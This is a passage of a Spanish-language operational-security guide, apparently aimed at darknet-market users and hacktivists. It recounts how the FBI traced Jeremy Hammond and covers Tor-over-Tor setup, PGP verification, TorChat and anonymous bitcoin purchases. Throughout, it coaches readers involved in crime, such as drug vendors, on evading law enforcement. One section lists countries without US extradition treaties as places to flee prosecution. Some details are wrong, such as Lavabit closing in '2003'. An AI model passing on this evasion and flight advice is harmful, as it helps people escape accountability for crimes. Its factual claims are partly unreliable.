tuvo otra conversación online sobre el truco de Stratfor, sobre unos 30,000 números de tarjetas de crédito que se habían robado de la compañía. Su interlocutor, CW-1 , participó con un poco de humor negro sobre lo que podría pasar en caso de que fuesen atrapados. Pero el ataque ya había sucedido. CW-1 era "Sabu", un Hacker de Anon / LulzSec que en la vida real era un desempleado de 28 años que vivía en viviendas públicas en la ciudad de Nueva York. Su apartamento en el sexto piso había sido visitado por el FBI en junio de 2011, y Sabu había sido arrestado y "convertido". Durante meses, había sido un informante del FBI, observado las 24 horas por un agente, utilizando un portátil del gobierno que registraba todo lo que se hacia. Es cuando se ve que Sabu está chateando con un usuario sup_g para tratar de hablar con él sobre los ataques que habian tenido lugar. Sabu se dirigio a sup_g con un nuevo nombre, "anarchaos". Resultó que sup_g tenia por muchos nombres, incluyendo "anarchaos", " quemar ", "yohoho", "PRISIONERO DE GUERRA", "tylerknowsthis" y "amenaza creíble". CW-1: si me asaltan anarchaos tu trabajo es causar havok en mi honor CW-1: <3 CW-1: sup_g: @sup_g: será así Normalmente, el intento de vincular diversos nombres, hubiese levantado las sospechas del hacker. Como le confió a Sabu, alguien más había intentado vincularle con los nombres "yohoho" y " grabar ", pero el hacker, nunca respondió ... Pero este era Sabu, una especie de semidiós hacker en el mundo de Anonymous. Si no puedes confiar en él, ¿en quién puedes confiar? Sabu incluso había proporcionado un servidor para almacenar los datos robados de Statfor, por lo que no podría estar comprado. Para identificar a sup_g, las autoridades primero recurrieron a los voluminosos registros de chat almacenados en el portatil de Sabu. Repasaron todos los comentarios que podrían ser plausiblemente vinculados a sup_g o uno de sus alias. El objetivo era ver si el Hacker se había descuidado en algún punto y había revelado cierta información personal. El 29 de agosto de 2011 a las 8:37 a.m., " burn " dijo en un canal IRC que "algunos camaradas fueron arrestados en San Luis hace unas semanas ... para que funcionen las arenas bituminosas de midwestring". Los agentes del FBI en Chicago pudieron confirmar que un evento llamado Midwest Rising contó con la presencia del hermano gemelo del residente de Chicago, Jeremy Hammond. (Hammond tenía una historia de anarquismo y protestas violentas). "Anarchaos" una vez indicó que había sido arrestado en 2004 por protestar en la Convención Nacional Republicana en la ciudad de Nueva York. Mucho más tarde, "yohoho" anotó que él no había estado en Nueva York "desde el RNC", uniendo los cabos a la misma persona. El FBI fue a la policía de la ciudad de Nueva York y obtuvo una lista de cada persona detenida en la convención de 2004, supieron que Jeremy Hammond había sido detenido, aunque no había sido arrestado. Las piezas comenzaban a encajar. " Sup_g " y " quemar " indicaron más tarde que habían pasado tiempo en prisión, con " quemaduras " que indicaban que había estado en una penitenciaría federal. Una búsqueda de los antecedentes penales de Hammond reveló que había sido arrestado en marzo de 2005 por el FBI de Chicago y se había declarado culpable de piratería informática en un "sitio web políticamente conservador y de robar su base de datos informática, incluida información de tarjetas de crédito". Hammond fue sentenciado a dos años de prisión por dicha acción. En otra conversación, " Anarchaos " le dijo a Sabu que una vez había pasado unas semanas en la cárcel de un condado por posesión de marihuana. También le pidió a Sabu que no le dijera a nadie, " porque podría comprometer su identidad ", e indicó que estaba en libertad condicional. Ambos coincidian con Hammond, que fue puesto en libertad condicional en noviembre de 2010 después de una violenta protesta contra los Juegos Olímpicos y la candidatura de Chicago. Cuando el FBI llevó a cabo un control de antecedentes penales en Hammond, reveló dos arrestos por posesión de marihuana. El FBI fue tan minucioso que incluso dio seguimiento a un comentario de "POW" diciendo que "bucear en un basurero es bueno, soy una dios freegan". El FBI fue a las autoridades de Chicago, que habían puesto a Hammond bajo vigilancia cuando lo estaban investigando en 2005. Como parte de esa vigilancia anterior, "los agentes vieron a Hammond ir a los contenedores de basura para conseguir comida". Esta es la razón por la cual todos necesitamos ser extra paranoicos con cada cosa que decimos de nosotros online. He visto a personas hablar sobre el país en el que viven, algunos incluso hablan sobre en qué estado viven. Si crees que el FBI nunca juntará las piezas, es posible que estés tristemente equivocado, como descubrió Jeremy Hammond. Ver la red WiFi reveló las direcciones de control de acceso a medios (MAC) de cada dispositivo conectado a la red. La mayoría de las veces solo había una, una Computadora Apple, anteriormente había dicho a Sabu que usaba un Macbook. El 1 de marzo, los agentes obtuvieron una orden judicial que les permitía usar un dispositivo de "registro/trampa y rastreo" que podía revelar solo "información de direccionamiento" y no de contenidos. En otras palabras, si funcionaba, los agentes podían ver qué direcciones IP visitaba Hammond, pero no verían nada más. Pronto se vio la dirección MAC de su Macbook conectándose a direcciones IP que se sabe que son parte de la red anónima de Tor. Y aunque esto definitivamente sonaba como su hombre, la Oficina hizo todo lo posible para verificar su objetivo. La técnica principal era observar cuando Hammond salía de su casa, luego llamar a Sabu en Nueva York y preguntar si alguno de los supuestos alias de Hammond acababa de salir del IRC o del sistema de mensajería instantánea Jabber. Si esto no te abre los ojos a alguno de los errores que muchos de ustedes han estado haciendo online, entonces necesita reevaluar cómo se manejan online. No lo haga, bajo ninguna circunstancia, nunca admita nada online a nadie. Nunca, en ninguna circunstancia, se atribuya el mérito de cualquier lucha por la libertad o hacktivismo en el que haya participado online. ¡Y por el amor de Dios, NUNCA inicie sesión en un servidor, especialmente uno que guarde registros con tu dirección IP real! ## Donde podrías dirigirte si no tienes otra opción No soy un experto de cómo evadir la extradición, ni cómo evadir al gobierno federal, la NSA u otras superpotencias, pero tengo algunas recomendaciones que podrías considerar si decides que no tienes otra opción que no sea la ejecución. Los siguientes países actualmente no tienen un tratado de extradición para los Estados Unidos: Afganistán, Argelia, Andorra, Angola, Armenia, Bahrein, Bangladesh, Bielorrusia, Bosnia y Herzegovina, Brunei, Burkina Faso, Birmania, Burundi, Camboya, Camerún, Cabo Verde, la República de África, Chad, China, Comoras, Congo (Kinshasa), Congo (Brazzaville), Djibouti, Guinea Ecuatorial, Eritrea, Etiopía, Gabón, Guinea, Guinea-Bissau, Indonesia, Costa de Marfil, Kazajstán, Kosovo, Kuwait, Laos, Líbano, Libia, Macedonia, Madagascar, Maldivas, Mali, Islas Marshall, Mauritania, Micronesia, Moldavia, Mongolia, Montenegro, Marruecos, Mozambique, Namibia, Nepal, Níger, Omán, Qatar, Rusia, Ruanda, Samoa, Santo Tomé y Príncipe, Arabia Saudita, Senegal, Serbia, Somalia, Sudán, Siria, Togo, Túnez, Uganda, Ucrania, Emiratos Árabes Unidos, Uzbekistán, Vanuatu, El Vaticano, Vietnam y Yemen. Esto no significa que estos países no te extraditen, pero si vas a elegir un país al cual huir, sería favorable elegir alguno de esta lista. Un país notable en esta lista, que es famoso por la extradición de uno de los propietarios de Pirate Bay, Gottfrid Svartholm a Suecia, desde Camboya. Aunque no existe tratado entre los dos países, fue extraditado por el gobierno. Todos sabemos que Edward Snowden huyó a Rusia desde Hong Kong después de salir de los Estados Unidos desde Hawai y ha permanecido allí desde entonces sin haber sido extraditado por el gobierno, se le concedió un asilo temporal. No está claro si Snowden podrá quedarse más tiempo que sus concesiones temporales de asilo, pero a partir de ahora es más que buscado por el gobierno de los Estados Unidos, y Rusia se niega a entregarlo. Otra persona involucrada en Pirate Bay llamada Fredrik Neij huyó a Laos en Asia tras ser declarada culpable de "ayudar a poner a disposición contenido de copyright", fue sentenciada a un año de prisión y se le ordenó pagar daños de 30 millones SEK (aproximadamente 2,740,900 €). Esto es, por supuesto, entre Laos y Suecia, pero Laos no ha extraditado a Fredrik, por lo que Laos puede ser una buena opción válida. A menudo escuchamos a personas de los Estados Unidos afirmar que si "la mierda se dispara", simplemente huirían a Canadá. Ni siquiera lo intentes, ni siquiera cruzarías la frontera. Canadá es como el hermano pequeño de los Estados Unidos. Cuando Estados Unidos dice salta, Canadá dice "¿Cómo de alto?". Manténte alejado de Canadá si nos estás leyendo desde los Estados Unidos. Incluso un activista de marihuana llamado Mark Emery, que era ciudadano canadiense, vivía en Canadá, pero vendió semillas de marihuana por Internet a personas en los EE.UU. Fue extraditado a los EE.UU. Para cumplir una condena de 5 años. Según los otros vendedores de semillas en el área, aquellos que solo vendían dentro de Canadá nunca habían sido arrestados, pero debido a que Emery lo vendió a los Estados Unidos, fue arrestado y extraditado. Y, por supuesto, sabemos que Irlanda y Australia extraditaron a dos de los moderadores de Silk Road a los Estados Unidos. Aunque no figura en la lista anterior, a una mujer, buscada en Estados Unidos por secuestro parental, llamada Chere Lyn Tomayko, se le concedió asilo en Costa Rica. Las autoridades de Costa Rica tomaron en cuenta las afirmaciones de Tomayko de que sus acciones estaban justificadas por la violencia doméstica que ella sufría. Assata Shakur fue acusada de asesinato, intento de asesinato, robo a mano armada, robo bancario y secuestro por parte de Estados Unidos y huyó a Cuba. Cuba en realidad tiene un tratado de extradición con Estados Unidos, pero las relaciones entre los dos países no han sido buenas desde la guerra fría entre los Estados Unidos y la Unión Soviética y por lo tanto las solicitudes no fueron respetadas, incluso para personas con cargos tan graves. Cuba puede ser una opción, pero nuevamente esto es solo algo a considerar ya que no somos expertos de la ninguna manera. ## Asegurar tu cuenta de la monitorización del FBI Algunas personas en el foro Skill Roads nunca se mostraban como online , incluso cuando claramente lo estaban, y otras veces aparecían online. Nos dimos cuenta de que habia una manera de nunca mostrar tu estado como online. ¿por qué querrías hacer esto de todos modos? Por las razones de las que hemos hablado anteriormente, no deseamos dar a las fuerzas del orden público la capacidad de ver cuando iniciamos sesión o cerramos la misma. Es una mala práctica, podemos dejar un rastro, dejar un patrón, y si eres una persona de interés y pueden conocer la hora en la que "fichas" en el foro con el momento en que salgas de tu casa, o te vayas a dormir, das más razones para sospechar y más pruebas para usar en tu contra en los tribunales. > Considera deshabilitar la opción de tu estado. ## Mentalidad de invencibilidas, tacticas de intimidación del gobierno Algunas personas tienen una mentalidad de invencibilidad que nunca podrá vincularse con ellas ni derivarse de sus comunicaciones online. ¿adivinas que? No tienen que usar tus comunicaciones online para descubrir quién eres. Todo lo que tiene que pasar es que hagas algo estúpido y te conviertas en una persona de interés, supervisarán tus actividades online de la mejor manera posible. Recuerda que solo tienes que arruinarlo una vez. Por ejemplo, tal vez se convierta en una persona de interés y el FBI obtenga una citación judicial en tu cuenta de Facebook en la que estúpidamente alardeaste ante un amigo acerca de su participación en ciertas actividades. Esto le sucedió a uno de los miembros de LulzSec que transfirió un archivo de datos que obtuvo a través de exploits de inyección SQL a un amigo suyo que usa su propio Facebook con su verdadero nombre. No hables nunca de ninguna de tus actividades online en ninguna plataforma de redes sociales. Incluso si una empresa actualmente no mantiene registros, una orden judicial quizás pueda usarse para obligar a una empresa a comenzar a mantener registros. Hush Mail se vio obligado a entregar 12 CDs de correos electrónicos de tres cuentas de Hushmail, siguiendo una orden judicial obtenida a través de un tratado de asistencia mutua entre los EE.UU. y Canadá. De acuerdo con el siguiente artículo. Cuando se trata de ser amenazado por una orden judicial del gobierno federal, el 99.99% de todas las compañías cumplirán para evitar el enjuiciamiento o ver su negocio cerrado. Pero una compañía decidió hacer frente a este tipo de intimidación, llamada LavaBit , nado rio a riba como buen salmón, y no cedio los datos. El servicio de correo electrónico utilizado por el informante Edward Snowden rechazó las solicitudes del FBI para "mostrar su propio sistema". El fundador de Lavabit, Ladar Levison , rechazó reiteradamente las demandas de las autoridades de entregar las claves de cifrado de su sistema, frustrando a los investigadores federales que intentaban rastrear las comunicaciones de Snowden. Levison está ahora sujeto a una orden del gobierno y ha apelado contra las órdenes de registro y las citaciones que exigen el acceso a su servicio. Cerró Lavabit en agosto de 2003 diciendo que no quería ser "cómplice en crímenes contra el pueblo estadounidense". En julio, las autoridades obtuvieron una orden de búsqueda que exigía a Lavabit entregar las claves de cifrado y las claves SSL que protegían el sitio. Levison fue amenazado con desacato criminal, que podría haberlo llevado a la cárcel, si no cumplía. Tal medida habría dado al gobierno acceso a toda la información de los usuarios de Lavabit. El tribunal ordenó que Levison fuese multado con $5,000 por día a partir del 6 de agosto hasta que entreguase las copias electrónicas de las llaves. Dos días más tarde, Levison entregó las llaves horas después de que cerrara la puerta de Lavabit. ¿Ves de lo que estoy hablando? El gobierno federal ordenó a este hombre que le entregara todas sus claves de cifrado y claves SSL, lo que comprometió la privacidad de 400,000 usuarios solo para que pudieran obtener más datos sobre un hombre, Edward Snowden. Y usaron tácticas intimidatorias e intentaron llevar a la bancarrota al dueño de Lavabit al multarlo con $5,000 por día hasta que le entregara las llaves. Desafortunadamente, Levison no tuvo más remedio que entregar las llaves o perder todo. Cualquiera que trate de enfrentarse al gobierno, especialmente en los Estados Unidos, recibirá una justicia rápida, órdenes judiciales y multas escandalosas a menos que cumplan y, además, con órdenes de mordaza para que no puedan contar a nadie la obra del gobierno. ## Cómo conectarse a TOR en la parte superior Me di cuenta de esto mientras trataba de encontrar una forma efectiva de hacer una conexión TOR -> VPN. Puedes hacer una conexión TOR -> TOR con Tails usando el programa llamado Tortilla , agregando así otra capa para que tus adversarios sufran buscandote. Si esto vale la pena o no, depende completamente de ti, pero estamos compartiendo en caso de que sea algo que quieras hacer. Sin embargo, actualmente solo funciona para aquellos que usan Windows porque fue diseñado para ser utilizado por usuarios de Windows. Ten en cuenta también que esto ralentizará notablemente tu conexión ya que está pasando por TOR dos veces. En esta página está el ejecutable autónomo precompilado La forma de hacerlo es muy simple en realidad. Primero debe descargar TOR Expert Bundle de la página de descargas de TOR Project e instalarlo en el ordenador o, mejor aún, en su unidad USB. Luego abrimos tor.exe y simplemente déjamos funcionar hasta que diga Bootstrapped 100% Listo . A continuación, ejecutamos el archivo tortilla.exe y nos aseguramos de ejecutarlo con privilegios de administrador. Además, si está ejecutando Windows Vista o posterior, es probable que obtengamos un error de que este programa no tiene un certificado válido, porque en realidad está firmado con algo llamado certificate firmado por prueba. En este caso, debemos permitir que los controladores firmados con prueba se ejecuten en el ordenador. Para hacer esto, simplemente vamos al Menú de Inicio y escribimos en el cuadro de búsqueda "cmd". Cuando aparezca el comando, hacemos clic con el botón derecho y haz clic en ejecutar como Administrador, se abrirá un símbolo del sistema. Luego escriba el siguiente comando: - Bcdedit.exe -set TESTSIGNING ON Esto permitirá a Windows instalar los controladores firmados por prueba. Reiniciamos el ordenador y veremos que en la esquina inferior derecha después de reiniciar el Modo de Prueba de Windows . Ahora podemos ejecutar Tortilla. Y nos permita que se conecte a TOR. Recuerde tener tor.exe de TOR Expert Bundle abierto primero. Finalmente, abre Virtual Box o cualquier software de Máquina Virtual que estés utilizando y haz clic en Configuración en la máquina virtual de Tails. Haz clic en la pestaña Red y cambia el menú desplegable donde dice Adjunto a : al adaptador bridge y en el menú desplegable a continuación denominado Nombre: Selecciona el Adaptador de tortilla. Ahora nuestra Máquina Virtual, en este caso Tails, siempre se conectará a Internet a través de Tortilla , que se conectará a través de TOR. Y dado que Tails establece su propia conexión con TOR, ejecutará TOR por encima de TOR. [Vídeo](https://www.youtube.com/watch?v=G_jDPQU-8YQ) ## Cómo verificar que tus archivos descargados son auténticos Como regla general, siempre debemos descargar los archivos de las páginas de inicio de sus respectivos desarrolladores. ( TOR, Tails, VirtualBox) La razón por la cual esto es tan importante es porque hay personas que alojan versiones modificadas de forma malintencionada de estos programas y que alojarán sitios con apariencia legítima para intentar que descarguen su versión, que puede instalar cosas como puertas traseras en sus computadoras, keyloggers y todo tipos de sorpresas desagradables A veces, los desarrolladores ofrecerán mirrors para sus proyectos, que son simplemente enlaces alternativos para descargar en caso de que el servidor principal sea demasiado lento o inactivo. A veces, estos espejos pueden verse comprometidos sin el conocimiento de los desarrolladores. Tal vez no tengamos TOR o Tails en el portátil y estémos viajando fuera del país y el hotel en el que nos hospedamos tiene la página principal de TOR bloqueada. Hay momentos en que puede que necesitemos encontrar un mirror alternativo para descargar ciertas cosas. Luego, por supuesto, está el infame ataque de man in the midle , donde un atacante puede inyectar código malicioso en tu tráfico de red y alterar el archivo que estás descargando. Los desarrolladores de TOR incluso han informado que los atacantes tienen la capacidad de engañar a tu navegador para que pienses que estás visitando la página de inicio de TOR, cuando en realidad no lo estás. Entonces, ¿qué hacemos al respecto? Puedes verificar que el archivo que descargamos es el legítimo. La mejor herramienta para esto es GnuPG. Podemos instalar este programa en la unidad USB o en el ordenador real, el sistema de operación de el ordenador real se conoce como su sistema operativo host. Descárgualo, ejecútalo, instálalo y te mostraremos cómo usar GnuPG. Si permanece en la página de descarga de GnuPG verás algo debajo del cuadro verde grande que se llama firma OpenPGP . Descargua eso en la misma carpeta que el archivo GnuPG, este es el archivo con el que se firmó la descarga. Básicamente la firma de alguien diciendo, hice este archivo. Y también necesitamos una clave pública de PGP para verificar la firma. Entonces, para resumirlo hasta ahora, la firma se crea desde la clave privada de PGP, y se puede verificar con la clave pública de PGP. El archivo de firma se usa para verificar el programa en sí. Así que tomemos la clave pública de PGP para GnuPG también. Si miramos en la misma página de descarga, debajo del título Instalación, veremos un enlace donde dice verificar la integridad del archivo. En otras palabras, básicamente debemos promover que la clave pública de PGP que descargó está segura al firmar la clave pública de PGP con tu propia clave privada, pero en realidad no necesitamos hacer eso y por ello no lo veremos. Tails nos explica que si nos preocupa una clave pública PGP comprometida, simplemente descargua la clave de varias fuentes y compáralas, si todas coinciden, es muy probable que estémos utilizando una clave legítima de PGP. Ahora pasemos finalmente a TOR porque este será un poco menos directo, pero una vez que lo hagasmos, deberíamos ser capaces de averiguar cómo verificar una app. Navega a la página de descarga de TOR y encuentra el paquete que deseas. Para mantener las cosas simples, elegimos Tor Browser Bundle, debajo de la casilla de descarga vemos un enlace (sig) el cual nos mostrará la firma PGP: -----BEGIN PGP SIGNATURE----- iQIcBAABCgAGBQJa8XKtAAoJENFIP6bDwHE2er0P/REMPOIZmQE8GvSKUxLr8cMn 05p5AmEnOa/uZFYdWbXcSZpJXPneiBonRSocnMAiZoO67KUIwpd1w/QxJ4oLzR7S uXFDpvG4uGaVU2fnnokvYfzx+4mUZZBCjLBV5FpaVfhM96Qo3UFUTpEbgsGM4HIz xaOl/aCThfHS+UwdluoUst1sF6Ae1mIoVIqjM5qI6KpaBcQsE7LOaMBX6A08TyVN 51BczWFnZAd/dk9HB+DiK/x62EqYsC3Gl9Mjo7SjmXIny+CVAfd/L4EJhl2MT/Li mDHeU2f9eFWbYa7i+nh5TZDqQGhAGGHtUty9dQpKvuWBv127RA09CtLqB3BCT2Ey kx98rqV4AA17fwhVhDWSGPwSzZRQv5qJL8SrK/TDkOdifkGc2OlFVQ8hbrXKjL3q TY+2BVBYooJSmKYbiHcxlXjds0ujuVzCE6XThP+Op9pcWlhasRhD0C7taNNBH+Ml q99lfIWHto/y0xttgWhyhm8a/utysp7KZLaEQJXV1rKarA9jB1VMNqN05Xzb1FRK ALFxOjQtoX1CKYetSJeb0+gHreVeCmb6L0FYl0c7BdvooqitU7Z+kBamaOJo7C/k jHyejn2Sen0B2Ow8n46zdVFkLyGHPr2z0wa4uwqDpAYkjaQYQVSlNrJK/Oy5fEiK +0YnruIUTTpxx72Egp+w =mFrS -----END PGP SIGNATURE----- A continuación, necesitamos la clave pública de PGP, ¿verdad? Bueno, resulta que con tantos desarrolladores trabajando en TOR, hay varias claves públicas de PGP, y ciertos paquetes fueron firmados con claves diferentes a otros paquetes. Por ello, necesitamos encontrar la clave pública de PGP que pertenece a nuestro paquete de navegador Tor. Tenemos una lista de todas las claves de firma que utilizan en TOR, podemos usar estas ID de clave para obtener lo que queremos simplemente haciendo clic derecho en el archivo de firma y haga clic en Verificar. Recibirás una advertencia. Mantén este número entero en mente para más adelante, se llama huella digital. Por ahora, si comparas los últimos 8 dígitos con la identificación de clave de Erinn Clark ( 0x63FEE659 ) que se encuentra en la página anterior, y dado que ella es la persona que firma los paquetes del navegador Tor, veremos que coinciden. Pero queremos ser un poco más minuciosos, nunca conformarnos con la mediocridad. Ve a la barra de tareas en Windows(si estamos en Windos) y encuentra el programa llamado Kleopatra , parece un círculo rojo con un pequeño cuadrado blanco. Haz click derecho y ve a Abrir el Administrador de certificados . Vamos a importar las llaves completas usando este administrador. También ten en cuenta que, si vamos a la pestaña que dice Otros Ceriticados , encontraremos las claves de Tails e Intevation (GnuPG) que utilizamos anteriormente almacenadas para el futuro cuando necesite descargar una nueva versión de esos programas y verificarlos de nuevo. Vamos a seguir las instrucciones de la página de firmas de verificación en el sitio web de TOR Project. Para importar claves, primero debemos agregar un directorio online donde se almacenen. Entonces, primero agreguemos el directorio online donde se almacenan las claves públicas de PGP según el sitio web de TOR. Hacemos clic en Configuración y luego en Configurar Kleopatra . A continuación, hacemos clic en Nuevo y vamos a ingresar la siguiente URL que tomamos directamente desde la página anterior. pool.sks-keyservers.net , y dejemos todo lo demás como predeterminado, clic en Aceptar para finalizar. Finalmente, hacemos clic en el botón que dice Certificados de búsqueda en el servidor y buscaremos la clave pública PGP de Errin Clark buscando su huella digital en la página web de TOR, verificando firmas , recuerde que ella es la promotora que firma el paquete del navegador Tor. La huella digital que estamos ingresando es 0x416F061063FEE659 , ¿te resulta familiar este número? Debería, es el número que obtuvimos la primera vez que intentamos verificar pero sin la clave pública de PGP real, si recibes la advertencias que aparecen al hacer una búsqueda, simplemente hacemos clic en Aceptar y aparecerá la clave de Errin Clark, selecciónela y haz clic en Importar. Ahora deberíamos tener su clave en la lista de certificados importados . Ten en cuenta que hay una advertencia porque no se ha asignado un índice de confianza a esta persona. Esto significa que GnuPG verificó que la clave haya hecho esa firma, pero depende de ti decidir si esa clave realmente le pertenece al desarrollador. El mejor método es conocer al desarrollador en persona e intercambiar las claves de huellas digital. ¡parece que nuestro paquete TOR Browser es legítimo! Ahora que sabemos qué hacer cuando el archivo de clave pública de PGP no está alojado directamente en el sitio, no tenemos más excusas para no verificar nuestras descargas. ### Verificar los mensajes firmados y firmar los mensajes propios Como acabamos de terminar una sección sobre verificación de descargas con firmas y claves públicas, es bueno ver de forma rápida cómo verificar los mensajes utilizando las mismas dos cosas, firmas y claves públicas. ¿Por qué deberímos preocuparnos por esto? ¿Cuál es el significado de firmar un mensaje? La razón es que, en caso de que alguien comprometa la cuenta del autor, debido por ejemplo a que tiene una contraseña débil o posiblemente un exploit en la codificación de un foro, entonces la persona no podría firmar los mensajes sin acceder a la clave privada del autor. Así que veamos cómo podemos verificar este mensaje. Antes de nada, debemos visitar la página de alguien que firme sus mensajes para coger la clave pública. Entonces, a menos que se comprometiera la clave privada del autor, sabemos que él mismo fue quien escribió ese mensaje. Vemos por qué algunas personas deciden firmar sus mensajes. Es una manera de verificar que su cuenta no se haya visto comprometida al verificar que la persona que controla la cuenta es la misma persona que tiene el control de la clave privada de PGP. ¿Quieres aprender a firmar un mensaje? Es muy fácil. Abre gedit Text Editor y escribe un mensaje. A continuación, seleccione el mensaje y cópielo en el portapapeles (haga clic con el botón derecho - Copiar) y luego haga clic en el icono del portapapeles en la parte superior y seleccione Firmar / Encriptar portapapeles con claves públicas . No elijas una clave de tu lista de claves públicas de PGP a menos que desee encriptar el mensaje. Si desea cifrar el mensaje para enviarlo a la bandeja de entrada de alguien o para que solo una persona pueda verlo, seleccione su nombre y lo encriptas con tu clave pública de PGP. En nuestro caso, solo queremos firmar el mensaje sin encriptarlo, pero podríamos hacer ambas cosas al mismo tiempo si así lo deseamos. Si miras hacia abajo cerca de la parte inferior, verás dónde dice Firmar mensaje como: haz clic en esto y selecciona tu clave personal. Te pedirá tu frase de contraseña porque recuerde que está firmando esto con su clave privada. Una vez que lo ingrese correctamente, el mensaje firmado de PGP se copiará en tu portapapeles y podrás pegarlo en cualquier lugar. ¿cuándo deberíamos firmar un mensaje? ¿Y cuándo no deberías firmar un mensaje? Gran pregunta, la mayoría de los usuarios probablemente no deberían firmar mensajes a menos que tengan que hacerlo porque le da una negación plausible. Es más fácil negar la publicación de ciertas cosas o ciertas comunicaciones que pudiesemos haber tenido con vendedores u otras personas, incluidas las fuerzas del orden público, si no firmamos nuestros mensajes, porque siempre puede reclamar que otra persona tuvo acceso a su cuenta. Es más difícil hacer esto si firmamos el mensaje con nuestra clave privada de PGP. Si estamos tratando con alguien que quiere verificar nuestra identidad y asegurarse de que nuestra firma actual coincida con la clave pública que tenían archivada desde hace 6 meses, tal vez podrían hacer que envíe un mensaje firmado. Pero nuevamente, todo lo que necesitan hacer es enviarle un mensaje encriptado con tu clave pública de PGP que tenían archivada, y si no pueden descifrarlo, no son quienes dicen ser. En la aplicación del mundo real, los desarrolladores pueden usar mensajes firmados de PGP en Anuncios o quizás nuevos lanzamientos de sus programas que proporcionen una URL de descarga para que los usuarios puedan estar seguros de que el desarrollador es el que publica la URL y no un atacante malintencionado que haya comprometido la cuenta del foro de el desarrollador. Un usuario promedio, no hay muchas veces en que debería estar firmando mensajes, pero es una opción ahora que ya sabes como hacerlo. ## ¡Un ejemplo realmente malo de OpSec - Smarten Up! ``` Rastreame si puedes ... ``` Increíble, lo que acabo de ver en Netflix. Esto no es realmente nuevo, se hizo en 2010, pero es bastante minucioso en su demostración de cómo desaparecer en la cultura moderna de EE.UU. Debo agregar que parte de la tecnología que presentó desde el otro lado es bastante alarmante. Entonces, ¿por qué es esto revelador? ¿Por qué es tan malo que para estar preguntandonoslo ? Bueno, Netflix recopila metadatos de sus usuarios al igual que cualquier otra corporación de big data. Si eres un usuario de Netflix, es probable que tengas un perfil que haga un seguimiento de cada película que hayas visto y lo que hayas calificado, y así sucesivamente. ¿Pero tal vez estaba usando una VPN para conectarse a Netflix? Estupendo…. usa esa VPN para cualquier otra cosa? Iniciando sesión en su correo electrónico, navegando por la web, etc. ... Incluso si usó una VPN, ¿quizás mantienen registros? Estamos hablando de actividaded poco seguras en ciberseguridad. Esto viene, por un vendedor de droga que en el foro de Skill Road, indicó que añoche estuvo viendo una película de Netflix. Si a esto le sumamos que en otro momento indicó en qué país vive, las drogas que ha importado a su país y de qué países ha importado esas drogas. Que ha hablado sobre cocinar drogas, habla de estar en una zona fría de su país, que no todas las partes de ese país en particular se enfrían... Esto ayudará a las fuerzas del orden a reducir la lista de sospechosos que obtuvieron de Netflix. (Interesante verdad) > ¡Mantén la boca cerrada sobre tu vida personal! ## TOR Chat Esto significa que cosas como Gmail, Hotmail, Yahoo Mail, Mensajes de Skype, Mensajes Instantáneos / Privados de Facebook, Mensajes de Texto y otras formas de comunicación probablemente estén siendo monitorizadas hasta cierto punto, al menos registrando los metadatos. Siempre debemos tratar todo como si aquellos que nos están monitorizando también pudieran leer el contenido del correo electrónico. Hemos hablado sobre la comunicación con PGP, hemos hablado sobre el uso de TOR y los Hidden Services, y hemos hablado sobre las buenas prácticas de OpSec. Pero algunos de nosotros queremos poder enviar un mensaje instantáneo a otra persona. La buena noticia es que podemos hacerlo con algo llamado TorChat . TorChat es un mensajero instantáneo anónimo descentralizado que utiliza servicios ocultos de Tor como red subyacente, en otras palabras, se comunica a través del protocolo de la red Tor .onion . Esto proporciona una encriptación de extremo a extremo como hablamos en publicaciones anteriores. Proporciona mensajes de texto criptográficamente seguros y transferencias de archivos para negocios y comunicación confidenciales entre dos personas. La mejor noticia es que podemos usar TorChat en Windows, Linux, Mac y smartphones. Podemos obtener TorChat para el iPhone en la Apple Store, también podemos obtener TorChat en Android Market, así que incluso podemos usarlo como un medio para enviar mensajes de texto a alguien más que también tenga TorChat. En TorChat, cada usuario tiene una identificación alfanumérica única que consta de 16 caracteres. Esta identificación será creada aleatoriamente por Tor cuando el cliente se inicia por primera vez, básicamente es la dirección .onion de un servicio oculto. Los clientes de TorChat se comunican entre sí utilizando Tor para ponerse en contacto con el servicio oculto del otro. Por ejemplo, la primera vez que abras TorChat, el ordenador podría generar d0dj309jfj94jfgf.onion y de aquí en adelante, d0dj309jfj94jfgf será tu ID de TorChat que darás a las personas que deseas enviar mensajes. En este momento, hay personas que debaten si TorChat es completamente seguro, y yo diría que TorChat es tan seguro como Tor, solo asegúrate de practicar las mismas buenas prácticas a las que estás acostumbrado. No proporcione información personal, si estás enviando información confidencial, usa cifrado PGP, etc. La seguridad de Torchat es desconocida. No se ha sometido a una auditoría de seguridad adecuada, profesional o de otro tipo, que sepamos. Crea un servicio oculto en el ordenador que lo deja vulnerable a los ataques de desanonización que se aplican a todos los servicios ocultos. También parece ser un protocolo muy básico que se parece a netcat sobre Tor. No hay forma de rechazar una transferencia de archivos. Se Inicia automáticamente la transferencia y escribe el archivo en /tmp, que es un tmpfs montado en la RAM en Linux. En teoría, un atacante podría transferir /dev /urandom hasta que llene su RAM y bloquee el ordenador. Esto sería ideal para inducir ataques de intersección. Aunque no estamos seguro si el kernel que está administrando el sistema, puede detener la transferencia cuando se quede sin RAM. Otra cosa es que una vez que alguien aprende tu ID de Torchat, no hay manera de evitar que sepan que estás online, incluso si los eliminas de tu lista de amigos. La razón es porque tu instancia de Torchat es un servicio oculto que publica un descriptor de servicio oculto que cualquiera puede descargar. No hay forma de desabilitarlo. Si deseamos cortar el contacto con alguien, debe obtener una nueva ID de Torchat. Por lo tanto, debemos ser muy conservadores sobre la distribución del ID Torchat y solo entregársela a asociados de gran confianza. ## Obtención, envio y receción de Bitcoins de forma anónima ¿Cual es la mejor manera de ontener BTC's? ¿Cómo puedo proteger mi identidad? Hemos hablado sobre una gran cantidad de formas de mantener nuestra seguridad, pero realmente no hemos hablado sobre cómo cambiar divisas. Lo primero que quiero decir es que no defendemos hacer cosas ilegales. Esto es sólo para fines educativos y nuestras recomendaciones se realizan suponiendo que está intercambiando monedas de forma anónima como un medio para proteger la propia privacidad. ¿Has encontrado algo online que deseas comprar, y nos piden Bitcoins como forma de pago?. ¿Cómo obtienes los Bitcoins y cómo los trasfieres? Vamos a explorar estas opciones hasta cierto punto, esperando que pueda tomar una decisión informada sobre qué método es mejor para cada situación. Las opciones que tenemos para comprar Bitcoins son las siguientes: 1. Registrarse en un intercambio online. Algunas web populares son MT Gox, BitStamp y Coinbase. La desventaja de comprar Bitcoins en estos intercambios, es que necesitamos verificar nuestra identidad con ellos mediante el envío de documentos (Licencia de conducir o pasaporte y una factura de servicios públicos). Si podemos superar este primer obstáculo, debemos encontrar la manera de ingresar dinero en la cuenta. En general, los intercambios solo aceptan transferencias bancarias como 